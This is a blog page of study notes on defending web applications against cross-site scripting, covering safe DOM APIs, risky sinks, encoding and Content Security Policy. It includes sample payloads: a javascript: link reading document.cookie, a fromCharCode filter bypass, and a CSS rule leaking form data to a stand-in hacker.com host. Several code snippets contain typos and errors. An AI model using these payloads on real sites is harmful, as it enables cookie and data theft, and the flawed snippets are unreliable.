<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  

  
  <title>Defending Against XXS | caketi</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  <meta name="description" content="#Anti-XSS Coding Best Practices**Dont’ allow any user-supplied data to be passwd into the DOM-except as strings**  Such a rule is not applicable to all applications, as many applications have feature">
<meta property="og:type" content="article">
<meta property="og:title" content="Defending Against XXS">
<meta property="og:url" content="http://example.com/2020/09/17/Defending%20Against%20XSS/index.html">
<meta property="og:site_name" content="caketi">
<meta property="og:description" content="#Anti-XSS Coding Best Practices**Dont’ allow any user-supplied data to be passwd into the DOM-except as strings**  Such a rule is not applicable to all applications, as many applications have feature">
<meta property="og:locale" content="en_US">
<meta property="article:published_time" content="2020-09-17T11:10:15.752Z">
<meta property="article:modified_time" content="2020-09-20T01:44:18.564Z">
<meta property="article:author" content="caketi">
<meta property="article:tag" content="红凯，乡秀树，北斗星司，东光太郎">
<meta name="twitter:card" content="summary">
  
    <link rel="alternate" href="/atom.xml" title="caketi" type="application/atom+xml">
  
  
    <link rel="icon" href="/favicon.png">
  
  
    <link href="//fonts.googleapis.com/css?family=Source+Code+Pro" rel="stylesheet" type="text/css">
  
  
<link rel="stylesheet" href="/css/style.css">

<meta name="generator" content="Hexo 5.2.0"></head>

<body>
  <div id="container">
    <div id="wrap">
      <header id="header">
  <div id="banner"></div>
  <div id="header-outer" class="outer">
    <div id="header-title" class="inner">
      <h1 id="logo-wrap">
        <a href="/" id="logo">caketi</a>
      </h1>
      
    </div>
    <div id="header-inner" class="inner">
      <nav id="main-nav">
        <a id="main-nav-toggle" class="nav-icon"></a>
        
          <a class="main-nav-link" href="/">Home</a>
        
          <a class="main-nav-link" href="/archives">Archives</a>
        
      </nav>
      <nav id="sub-nav">
        
          <a id="nav-rss-link" class="nav-icon" href="/atom.xml" title="RSS Feed"></a>
        
        <a id="nav-search-btn" class="nav-icon" title="Search"></a>
      </nav>
      <div id="search-form-wrap">
        <form action="//google.com/search" method="get" accept-charset="UTF-8" class="search-form"><input type="search" name="q" class="search-form-input" placeholder="Search"><button type="submit" class="search-form-submit">&#xF002;</button><input type="hidden" name="sitesearch" value="http://example.com"></form>
      </div>
    </div>
  </div>
</header>
      <div class="outer">
        <section id="main"><article id="post-Defending Against XSS" class="article article-type-post" itemscope itemprop="blogPost">
  <div class="article-meta">
    <a href="/2020/09/17/Defending%20Against%20XSS/" class="article-date">
  <time datetime="2020-09-17T11:10:15.752Z" itemprop="datePublished">2020-09-17</time>
</a>
    
  </div>
  <div class="article-inner">
    
    
      <header class="article-header">
        
  
    <h1 class="article-title" itemprop="name">
      Defending Against XXS
    </h1>
  

      </header>
    
    <div class="article-entry" itemprop="articleBody">
      
        <a id="more"></a>
<p>#Anti-XSS Coding Best Practices<br>**<em>Dont’ allow any user-supplied data to be passwd into the DOM-except as strings**</em></p>
<blockquote>
<p>Such a rule is not applicable to all applications, as many applications have features<br>that incorporate users to DOM data transfer. In this case, we can make this rule more<br>specific: “never allow any unsanitized user-supplied data to be passed into the DOM.”</p>
</blockquote>
<p>perfrom checks a number of ways on both the client and the server.</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">const</span>  isString = <span class="function"><span class="keyword">function</span>(<span class="params">x</span>)</span>&#123;</span><br><span class="line">    <span class="keyword">if</span> (<span class="keyword">typeof</span> x === <span class="string">&#x27;string&#x27;</span> || x <span class="keyword">instanceof</span> <span class="built_in">String</span>)&#123;</span><br><span class="line">        <span class="keyword">return</span> <span class="literal">true</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">return</span> <span class="literal">false</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<blockquote>
<p>unfortunately, this check will fail when checking numbers–an edge case that can be annoying to deal with beacause numbers are also safe fro injection into the DOM.</p>
</blockquote>
<p>***We can categorize strings and numbers into “string-like” objects. evaluate a “string-like” obj using a relatively unknown side effect of JSON.parse():</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">const</span> isStringLike = <span class="function"><span class="keyword">function</span>(<span class="params">x</span>)</span>&#123;</span><br><span class="line">    <span class="keyword">try</span>&#123;</span><br><span class="line">        <span class="keyword">return</span> <span class="built_in">JSON</span>.stringify(<span class="built_in">JSON</span>.parse(x)) === x;</span><br><span class="line">    &#125;<span class="keyword">catch</span>(e)&#123;</span><br><span class="line">        <span class="built_in">console</span>.log(<span class="string">&#x27;not string-like&#x27;</span>)</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<blockquote>
<p><strong><em>JSON.parse()</em></strong> — built into js — attempts to convert text to JSON object. Numbers and strings will pass the check, but complex objects such as fucntions will fail as they do not fit a format compatible with JSON</p>
</blockquote>
<p>Finally, we must ensure that even when we have a string object or string-like object,<br>the DOM interprets it as string/string-like. This is because string objects, while not<br>DOM themselves, can still be interpreted as DOM or converted into DOM, which we<br>want to avoid.</p>
<blockquote>
<p>Generally, we inject user data into the DOM using innerText or innerHTML. When<br>HTML tags are not needed, innerText is much safer because it attempts to sanitize<br>anything that looks like an HTML tag by representing it as a string<br>####Less safe:</p>
</blockquote>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">const</span> userString = <span class="string">&#x27;&lt;strong&gt;cakeit&lt;/strong&gt;;</span></span><br><span class="line">const div = document.querySelector(&#x27;#userComment&#x27;)</span><br><span class="line">div.innerHTML = userString <span class="comment">// tags interpreted as DOM</span></span><br></pre></td></tr></table></figure>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">const</span> userString = <span class="string">&#x27;&lt;strong&gt;cakeit&lt;/strong&gt;;</span></span><br><span class="line">const div = document.querySelector(&#x27;#userComment&#x27;)</span><br><span class="line">div.innerText = userString; <span class="comment">// tags interpreted as  strings </span></span><br></pre></td></tr></table></figure>
<blockquote>
<p>This is because innerText performs its<br>own sanitization in order to view HTML tags as strings, whereas innerHTML does not<br>perform such sanitization and will interpret HTML tags as HTML tags when loaded<br>into the DOM. The sanitized innerText is not failsafe, as each browser has its own<br>variations on the exact implementation, and with a quick internet search you can find<br>a variety of current and historical ways to bypass the sanitization<br>#Sanitizing User Input<br>Sometimes you will not be able to rely on a useful tool like innerText to aid you in<br>sanitizing user input. This is particularly common when you need to allow certain<br>HTML tags, but not others</p>
</blockquote>
<hr>
<p>+For example, you may want to allow <strong><strong><br>and <i></i> but not <script></script>. In these cases, you want to make sure you<br>extensively sanitize the user-submitted data prior to injecting it into the DOM<br>===============================</p>
<p>For example, let’s assume your sanitizer blocks single and double quotes as well as<br>script tags. You could still run into this issue:</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">a</span> <span class="attr">href</span>=<span class="string">&quot;javascript:alert(document.cookie)&quot;</span>&gt;</span>clck me<span class="tag">&lt;/<span class="name">a</span>&gt;</span></span><br></pre></td></tr></table></figure>

<p>Using this method with other DOM methods, you can even bypass the filtration on<br>single and double quote:</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">a</span> <span class="attr">href</span>=<span class="string">&quot;javascript:alert(String.fromCharCode(88,83,83))&quot;</span>&gt;</span>click me<span class="tag">&lt;/<span class="name">a</span>&gt;</span></span><br></pre></td></tr></table></figure>
<blockquote>
<p>would alert “XSS” as the string has been derived rom the <strong><em>String.fromCharCode() API</em></strong></p>
</blockquote>
<p>Stay away from the following APIs when possible:</p>
<ul>
<li>element.innerHTM<code>L / </code>element.outerHTML</li>
<li>Blob</li>
<li>SVG</li>
<li>document.write / document.writeln</li>
<li>DOMParser.parseFromString</li>
<li>document.implementation<br>#DOMParser Sink<br>allow develop to easily generate DOM or script from text<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">const</span> parser = <span class="keyword">new</span> DOMParser();</span><br><span class="line"><span class="keyword">const</span> html = parser.parseFromString(<span class="string">&#x27;&lt;script&gt;alert(&quot;hi&quot;);&lt;/script&gt;&#x27;</span>);</span><br></pre></td></tr></table></figure>
<blockquote>
<p>This API loads the cotents of the string in <strong><em>parseFromString</em></strong> into DOM nodes reflecting the structure of the input string.This could be used for filling a page with<br>structured DOM from a server, which may be beneficial when you want to turn a<br>complex DOM string into properly organized DOM nodes.</p>
</blockquote>
</li>
</ul>
<p>However, manually creating each node with document.createElement() and organ‐<br>izing them using document.appendChild(child) offers significantly less risk. You<br>now are controlling the structure and tag names of the DOM while the payload only<br>controls the content.<br>###SVG Sink<br>sinificant risk— store arbitrary data and yet still are capable of code execution:</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;!DOCTYPE <span class="meta-keyword">svg</span> <span class="meta-keyword">PUBLIC</span> <span class="meta-string">&quot;-//W3C//DTD SVG 1.1//EN&quot;</span></span></span><br><span class="line"><span class="meta"><span class="meta-string">&quot;http://www.w3.org/Graphics/SBG/1.1/DTD/sbg11.dtd&quot;</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">svg</span> <span class="attr">version</span>=<span class="string">&quot;1.1&quot;</span> <span class="attr">xmlns</span>=<span class="string">&quot;http://www.w3.org/2000/svg&quot;</span>&gt;</span></span><br><span class="line"> <span class="tag">&lt;<span class="name">circle</span> <span class="attr">cx</span>=<span class="string">&quot;258&quot;</span> <span class="attr">cy</span>=<span class="string">&quot;250&quot;</span> <span class="attr">r</span>=<span class="string">&quot;50&quot;</span> <span class="attr">fill</span>=<span class="string">&quot;red&quot;</span> /&gt;</span></span><br><span class="line"> <span class="tag">&lt;<span class="name">script</span> <span class="attr">type</span>=<span class="string">&quot;text/javascript&quot;</span>&gt;</span><span class="javascript"><span class="built_in">console</span>.log(<span class="string">&#x27;test&#x27;</span>):</span><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">svg</span>&gt;</span></span><br></pre></td></tr></table></figure>
<p>Scalable Vecotr Graphics — SVG– wonderful for displaying images consisitently across a wide number of devices— reliance on the XML spec that allow script execution, they are much riskier </p>
<blockquote>
<p>We saw in Part II that we could use the image tag <img> to launch CSRF attacks since<br>the <img> tag supports a href. SVGs can launch any type of JavaScript onload, making<br>them significantly more dangerous.<br>####Blob Sink</p>
</blockquote>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// create blob with script reference </span></span><br><span class="line"><span class="keyword">const</span> blog = <span class="keyword">new</span> Blob([script], &#123;<span class="attr">type</span>: <span class="string">&#x27;text/javascript&#x27;</span>&#125;)</span><br><span class="line"><span class="keyword">const</span> url = URL.creteObjectURL(blob)</span><br><span class="line"><span class="comment">// inject script into page for execution</span></span><br><span class="line"><span class="keyword">const</span> script  = <span class="built_in">document</span>.createElement(<span class="string">&#x27;script&#x27;</span>)</span><br><span class="line">script.src = url</span><br><span class="line"></span><br><span class="line"><span class="comment">// load the script into the page </span></span><br><span class="line"><span class="built_in">document</span>.body.appendChild(script)</span><br></pre></td></tr></table></figure>

<p>Furthermore, blobs can store data in many formats; base64 as a blob is simply a con‐<br>tainer for arbitrary data. As a result, it is best to leave blobs out of your code if possi‐<br>ble, especially if any of the blob instantiation process involves user data.<br>####Sanitizing Hyperlinks</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">&lt;button onclick=<span class="string">&quot;goToLink()&quot;</span>&gt;click me&lt;/button&gt;</span><br><span class="line"><span class="keyword">const</span> userLink = <span class="string">&quot;&lt;script&gt;alert(&#x27;hi&#x27;)&lt;/script&gt;&quot;</span>;</span><br><span class="line"><span class="keyword">const</span> goToLink = <span class="function"><span class="keyword">function</span>(<span class="params"></span>) </span>&#123;</span><br><span class="line"> <span class="built_in">window</span>.location.href = <span class="string">`https://mywebsite.com/<span class="subst">$&#123;userLink&#125;</span>`</span>;</span><br><span class="line"> <span class="comment">// goes to: https://my-website.com/&lt;script&gt;alert(&#x27;hi&#x27;)&lt;/script&gt;</span></span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure>

<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">const</span> userLink = <span class="string">&quot;&lt;script&gt;alert(&#x27;hi&#x27;)&lt;/script&gt;&quot;</span>;</span><br><span class="line"><span class="keyword">const</span> goToLink = <span class="function"><span class="keyword">function</span>(<span class="params"></span>) </span>&#123;</span><br><span class="line"> <span class="keyword">const</span> dummy = <span class="built_in">document</span>.createElement(<span class="string">&#x27;a&#x27;</span>);</span><br><span class="line"> dummy.href = userLink;</span><br><span class="line"> <span class="built_in">window</span>.location.href = <span class="string">`https://mywebsite.com/<span class="subst">$&#123;dummy.a&#125;</span>`</span>;</span><br><span class="line"> <span class="comment">// goes to: https://my-website.com/%3Cstrong%3Etest%3C/strong</span></span><br><span class="line">&#125;;</span><br><span class="line">goToLink();</span><br></pre></td></tr></table></figure>

<p>encodeURIComponent(‘<strong>test&lt;/strong’); // %3Cstrong%3Etest%3C%2Fstrong%3E</p>
<blockquote>
<p>Note that encodeURIComponent() cannot be used for an entire URL string as it will<br>no longer conform to the HTTP spec because scheme as the origin (scheme + :// +<br>hostname + : + port) cannot be interpreted by browsers when encoded (it becomes<br>a different origin).</p>
</blockquote>
<p>####HTML Entity Encoding<br>The “big five” for entity encoding are shown</p>
<table>
<thead>
<tr>
<th>Charcter</th>
<th>Entity encoded</th>
</tr>
</thead>
<tbody><tr>
<td>&amp;</td>
<td>&amp; + amp;</td>
</tr>
<tr>
<td>&lt;</td>
<td>&amp; + lt;</td>
</tr>
</tbody></table>
<blockquote>
<pre><code>      |   &amp; + gt;</code></pre>
<p>“           |   &amp; + #034;<br>‘           |   &amp; + #039;</p>
</blockquote>
<p>Entity encoding will NOT protect any content injected inside of a <script></script> tag, CSS, or a URL. It will only protect against content injected into a <div></div> or <div></div>-like DOM node. This is because it is possible to create a<br>string of HTML entity encoded strings in such an order that part of the string is still<br>valid JavaScript.<br>####CSS</p>
<p> Any time an image from another origin is<br>loaded into the page, a GET request is issued—be it from HTML, JS, or CSS.<br>In CSS we can use the background:url attribute to load an image from a provided<br>domain. Because this is an HTTP GET, it can also include query params.</p>
<p>CSS also allows for selective styling based on the condition of a form. This means we<br>can change the background of an element in the DOM based on the state of a form<br>field:</p>
<figure class="highlight css"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="selector-id">#income</span><span class="selector-attr">[value=<span class="string">&quot;&gt;100k&quot;</span>]</span> &#123;</span><br><span class="line"> <span class="attribute">background</span>:<span class="built_in">url</span>(<span class="string">&quot;https://www.hacker.com/incomes?amount=gte100k&quot;</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>As you can see, when the income button is set to &gt;100k, the CSS background changes,<br>initiating a GET request and leaking the form data to another website.</p>
<p>In conclusion, CSS attacks can be avoided by:<br>[easy]<br>Disallowing user-uploaded CSS<br>[medium]<br>Allowing only specific fields to be modified by the user and generating the<br>custom stylesheet yourself on the server using these fields<br>[hard]<br>Sanitizing any HTTP-initiating CSS attributes (background:url)</p>
<p>####Content Security Policy for XSS Prevention</p>
<blockquote>
<p>CSP protections come in several forms, including what external scripts can be loaded,<br>where they can be loaded, and what DOM APIs are allowed to execute the script.</p>
</blockquote>
<p>The “self” in the CSP declaration simply refers to the current URL from which the<br>policy is loaded and the protected document is being served. As such the CSP script<br>source is actually used for defining multiple URLs: safe URLs to load scripts from,<br>and the current URL.</p>
<p>CSP allows you to specifically whitelist URLs from which dynamic scripts can be<br>loaded. This is known as script-src in your CSP. A simple script-src looks like<br>this: Content-Security-Policy: script-src “self” <a target="_blank" rel="noopener" href="https://api.megabank.com/">https://api.megabank.com</a>.<br>With such a CSP configuration, attempting to load a script from <a target="_blank" rel="noopener" href="https://api2.megabank.com/">https://api2.megabank.com</a> would not be successful, and the browser would throw a CSP violation<br>error. This is very beneficial because it means scripts from unknown sources, like<br><a target="_blank" rel="noopener" href="https://www.hacker.com/">https://www.hacker.com</a>, would not be able to load and execute on your site</p>
<p>One way to mitigate the risk of scripts you did not write executing inside of your<br>application is to reduce the number of allowed script sources.<br>####Unsafe Eval and Unsafe Inline<br>By default, inline script execution is disabled when CSP is enabled. This can be reenabled by adding unsafe-inline to your script-src definition.<br>Similarly, eval() and similar methods that provide string -&gt; code interpretation<br>are disabled by default when CSP is enabled. This can be disabled with the flag<br>unsafe-eval inside of your script-src definition.</p>
<p>If you are relying on eval or an eval-like function, it is often wise to try to rewrite<br>that function in a way that does not cause it to be interpreted as a string. For example:</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">const</span> startCountDownTimer = <span class="function"><span class="keyword">function</span>(<span class="params">minutes, message</span>) </span>&#123;</span><br><span class="line"> <span class="built_in">setTimeout</span>(<span class="string">`window.alert(<span class="subst">$&#123;message&#125;</span>);`</span>, minutes * <span class="number">60</span> * <span class="number">1000</span>);</span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure>
<p>is written more safely as:</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">const</span> startCountDownTimer = <span class="function"><span class="keyword">function</span>(<span class="params">minutes, message</span>) </span>&#123;</span><br><span class="line"><span class="built_in">setTimeout</span>(<span class="function"><span class="keyword">function</span>(<span class="params"></span>) </span>&#123;</span><br><span class="line"> alert(message);</span><br><span class="line">&#125;, minutes * <span class="number">60</span> * <span class="number">1000</span>);</span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure>
<p>While both are valid uses of setTimeout(), one is much more prone to XSS script<br>execution as the complexity of the function grows with the addition of new features.<br>Any function that is interpreted as a string risks potential escape, leading to code exe‐<br>cution. More specific functions with highly specific parameters reduce the risk of<br>unintended script execution.<br>####Implementing a CSP</p>
<p>CSP is easy to implement as it is simply a string configuration modifier that is read by<br>the browser and translated into security rules</p>
<p>P, but the most common are:</p>
<ul>
<li>Have your server send a content-Security-Policy header with each request.<br>The data in the header should be the security policy itself.</li>
<li>Embed a <meta> tag in your HTML markup. The meta tag should look like:<meta http-equiv="Content-Security-Policy" content="script-src
https://www.mega-bank.com;">
It is wise to enact CSP as a first step in XSS mitigation if you already know what type
of programming constructs and APIs your application will rely on. This means that if
you know where you will consume code and how you will consume it, make sure to
244 | Chapter 22: Defending Against XSS Attacks
write the correct CSP strings up and utilize them right when you start development.
CSP can be easily changed at a later date.
###Summary
difficulty is protecting your website against XSS usually comes when u have a feature requirement to display user-submitted infor as DOM rather than as text.</li>
</ul>

      
    </div>
    <footer class="article-footer">
      <a data-url="http://example.com/2020/09/17/Defending%20Against%20XSS/" data-id="ckfah5pjl000490thhkt02nkj" class="article-share-link">Share</a>
      
      
    </footer>
  </div>
  
    
<nav id="article-nav">
  
    <a href="/2020/09/18/Defending%20Against%20CSRF%20Attacks/" id="article-nav-newer" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Newer</strong>
      <div class="article-nav-title">
        
          Defending Against CSRF
        
      </div>
    </a>
  
  
    <a href="/2020/09/17/Vulnerability%20Management/" id="article-nav-older" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Older</strong>
      <div class="article-nav-title">Vulnerability Management</div>
    </a>
  
</nav>

  
</article>

</section>
        
          <aside id="sidebar">
  
    

  
    

  
    
  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Archives</h3>
    <div class="widget">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2020/09/">September 2020</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Recent Posts</h3>
    <div class="widget">
      <ul>
        
          <li>
            <a href="/2020/09/20/test/">(no title)</a>
          </li>
        
          <li>
            <a href="/2020/09/19/XXE-notes-intro-level/">XXE-notes-intro-level</a>
          </li>
        
          <li>
            <a href="/2020/09/19/GitHub%20host%E9%85%8D%E7%BD%AE/">Github host 配置</a>
          </li>
        
          <li>
            <a href="/2020/09/19/Caketi-on-the-way/">Caketi  on the way</a>
          </li>
        
          <li>
            <a href="/2020/09/19/hello-world/">Hello World</a>
          </li>
        
      </ul>
    </div>
  </div>

  
</aside>
        
      </div>
      <footer id="footer">
  
  <div class="outer">
    <div id="footer-info" class="inner">
      &copy; 2020 caketi<br>
      Powered by <a href="http://hexo.io/" target="_blank">Hexo</a>
    </div>
  </div>
</footer>
    </div>
    <nav id="mobile-nav">
  
    <a href="/" class="mobile-nav-link">Home</a>
  
    <a href="/archives" class="mobile-nav-link">Archives</a>
  
</nav>
    

<script src="//ajax.googleapis.com/ajax/libs/jquery/2.0.3/jquery.min.js"></script>


  
<link rel="stylesheet" href="/fancybox/jquery.fancybox.css">

  
<script src="/fancybox/jquery.fancybox.pack.js"></script>




<script src="/js/script.js"></script>




  </div>
</body>
</html>